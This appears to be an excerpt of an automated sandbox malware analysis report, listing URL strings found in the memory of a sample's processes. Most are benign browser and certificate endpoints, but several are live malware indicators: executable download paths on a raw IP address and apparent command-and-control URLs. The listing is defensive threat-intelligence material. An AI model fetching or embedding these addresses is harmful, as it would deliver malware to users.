                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/steam/random.exe
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/test/am_no.bat
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/test/exe/random.exe
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/well/random.exe
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/well/random.exe08TU
                      Source: 19be97887a.exe, 0000001E.00000003.2000452284.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7:80/mine/random.exe
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: firefox.exe, 00000034.00000002.1990196236.000001F91EA82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://mail.yahoo.co.jp/compose/?To=%s
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
                      Source: powershell.exe, 0000000C.00000002.940983859.000002563FE64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                      Source: svchost.exe, 00000015.00000002.2129097512.000002CF0FA8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.html
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
                      Source: firefox.exe, 00000034.00000002.1985782385.000001F91E426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/common
                      Source: firefox.exe, 00000034.00000002.1985782385.000001F91E462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/dates-and-times
                      Source: firefox.exe, 00000034.00000002.1985782385.000001F91E426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/math
                      Source: firefox.exe, 00000034.00000002.1985782385.000001F91E462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/regular-expressions
                      Source: firefox.exe, 00000034.00000002.1985782385.000001F91E426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/sets
                      Source: firefox.exe, 00000034.00000002.1980859392.000001F912D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/strings
                      Source: svchost.exe, 00000015.00000003.1203494684.000002CF0F8C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: firefox.exe, 00000034.00000002.2034146199.000001F922A3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1988159515.000001F91E5B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1985782385.000001F91E49E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2034146199.000001F922A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2034146199.000001F922A06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922777000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1991428513.000001F91ED89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
                      Source: powershell.exe, 0000000C.00000002.970405411.0000025651CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.970405411.0000025651B6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.941241266.00000256434CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1045529664.0000024D901AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1045529664.0000024D9006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                      Source: powershell.exe, 0000000F.00000002.956232423.0000024D8022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: firefox.exe, 00000034.00000002.1990196236.000001F91EA82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sCan
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
                      Source: powershell.exe, 0000000C.00000002.941241266.0000025641B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.956232423.0000024D80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: firefox.exe, 00000034.00000002.1990196236.000001F91EA82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/URIFixup.sys.mjs
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
                      Source: powershell.exe, 0000000F.00000002.956232423.0000024D8022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: firefox.exe, 00000034.00000002.1990196236.000001F91EA82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shttps://mail.inbox.lv/compose?to=%s
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
                      Source: powershell.exe, 0000000C.00000002.940983859.000002563FE64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: 2qv26zF.exe, 2qv26zF.exe, 0000001D.00000002.2112781508.00000176360A4000.00000004.00000020.00020000.00000000.sdmp, 2qv26zF.exe, 0000001D.00000002.2116999751.0000017637AB0000.00000040.00001000.00020000.00000000.sdmp, 2qv26zF.exe, 0000001D.00000003.1855748033.0000017637E2E000.00000004.00000020.00020000.00000000.sdmp, 2qv26zF.exe, 0000001D.00000003.1855748033.0000017637DB5000.00000004.00000020.00020000.00000000.sdmp, 2qv26zF.exe, 0000001D.00000003.1855748033.0000017637E28000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, spoolsv.exe, 0000001F.00000003.1855042345.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.1842727698.0000000002071000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.1994559542.00000000022E9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.2088858561.0000000001653000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.2005686989.0000000002276000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.1848199291.0000000001A18000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.2028479893.0000000001A1F000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.2086449801.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.1845357722.00000000019AC000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.1992491073.00000000019AA000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.1847223350.00000000019AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.1841984407.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.1843105811.0000000001A1B000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.2088858561.00000000016C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
                      Source: firefox.exe, 00000034.00000003.1956668985.000001F922A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1957376931.000001F922A3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958286370.000001F922A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1956268965.000001F922800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958008473.000001F922A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/https://www.google.com/searchWikipedia
                      Source: 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/settings/clients
                      Source: firefox.exe, 00000034.00000002.1983640551.000001F91497A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.co
                      Source: firefox.exe, 00000034.00000002.1983640551.000001F914970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser-check--disable-popup-blockin
                      Source: firefox.exe, 00000034.00000002.1983640551.000001F914A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RESTART_ARG_3=--no-default-brow
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp
                      Source: powershell.exe, 0000000C.00000002.941241266.0000025641B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.956232423.0000024D80001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://amazon.com
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://api.accounts.firefox.com/v1
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
                      Source: firefox.exe, 00000034.00000002.1980859392.000001F912D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://blocked.cdn.mozilla.net/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
                      Source: 19be97887a.exe, 0000001E.00000003.1788130684.000000000589A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1985782385.000001F91E4AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                      Source: 19be97887a.exe, 0000001E.00000003.1788130684.000000000589A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1985782385.000001F91E4AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1378427
                      Source: 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: 19be97887a.exe, 0000001E.00000003.1726455907.00000000058C9000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: 19be97887a.exe, 0000001E.00000003.1726455907.00000000058C9000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958008473.000001F922A57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://completion.amazon.com/search/complete?q=
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://content.cdn.mozilla.net
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.
                      Source: 19be97887a.exe, 0000001E.00000003.1788130684.000000000589A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1985782385.000001F91E4AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                      Source: 19be97887a.exe, 0000001E.00000003.1788130684.000000000589A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1985782385.000001F91E4AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
                      Source: powershell.exe, 0000000F.00000002.1045529664.0000024D9006D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000F.00000002.1045529664.0000024D9006D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000F.00000002.1045529664.0000024D9006D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://coverage.mozilla.org
                      Source: firefox.exe, 00000034.00000002.1980859392.000001F912D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://crash-stats.mozilla.org/report/index/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://dap-02.api.divviup.org
                      Source: 19be97887a.exe, 0000001E.00000003.1867210058.0000000000D60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://defaulemot.run/
                      Source: 19be97887a.exe, 00000023.00000003.1868838432.0000000000D73000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://defaulemot.run/0g
                      Source: 19be97887a.exe, 0000001E.00000003.2006194784.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1826169771.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1753945478.00000000058B1000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1785686252.0000000005891000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1861995651.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1822807312.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1827281753.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1816412017.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1831756207.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1829292080.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1818941656.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1869981140.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1831672811.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1753599046.00000000058B1000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1815975585.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1999887350.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1868750086.0000000000D82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://defaulemot.run/jUSiaz
                      Source: 19be97887a.exe, 0000001E.00000003.2000452284.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1833397027.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1832789599.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1861451133.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://defaulemot.run/jUSiaz$I
                      Source: 19be97887a.exe, 0000001E.00000003.1888188996.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://defaulemot.run/jUSiaz-I
                      Source: 19be97887a.exe, 0000001E.00000003.1785686252.0000000005891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://defaulemot.run/jUSiazAa
                      Source: 19be97887a.exe, 0000001E.00000003.1861814703.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://defaulemot.run/jUSiazX
                      Source: 19be97887a.exe, 0000001E.00000003.1753945478.00000000058B1000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1753599046.00000000058B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://defaulemot.run/jUSiazd
                      Source: 19be97887a.exe, 0000001E.00000003.2000452284.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1868838432.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://defaulemot.run:443/jUSiaz
                      Source: 19be97887a.exe, 0000001E.00000003.2000452284.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1861451133.0000000000D09000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://defaulemot.run:443/jUSiaz?
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
